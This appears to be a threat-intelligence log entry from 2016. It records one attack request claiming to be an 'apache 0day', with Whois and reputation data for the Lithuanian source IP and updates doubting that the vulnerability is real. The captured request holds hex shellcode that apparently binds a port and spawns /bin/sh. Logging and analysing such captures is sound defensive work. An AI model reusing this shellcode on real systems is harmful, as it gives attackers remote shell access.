BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/ˠ%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*
31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80
END OF DATA
185.130.5[.]224
- Whois Data (TeamCymru)
- AS : 203569
- IP : 185.130.5.224
- BGP Prefix : 185.130.5.0/24
- CC : LT
- Registry : ripencc
- Allocated : 2015-12-04
- AS Name: SILK-AS Sindicate Group Ltd,LT
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: IBM X-Force Exchange
- Score: 1.4
- Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
- Dynamic Source: SANS Internet Storm Cast
- comment: IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/185.130.5.224
UPDATE:
The vulnerability (if it exists and is not just a marketing idea to gain Twitter followers) is not reflected by any entry on exploit-db.com or 0day.today.
UPDATE 2: (Thanks to @DanielRufde)
https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0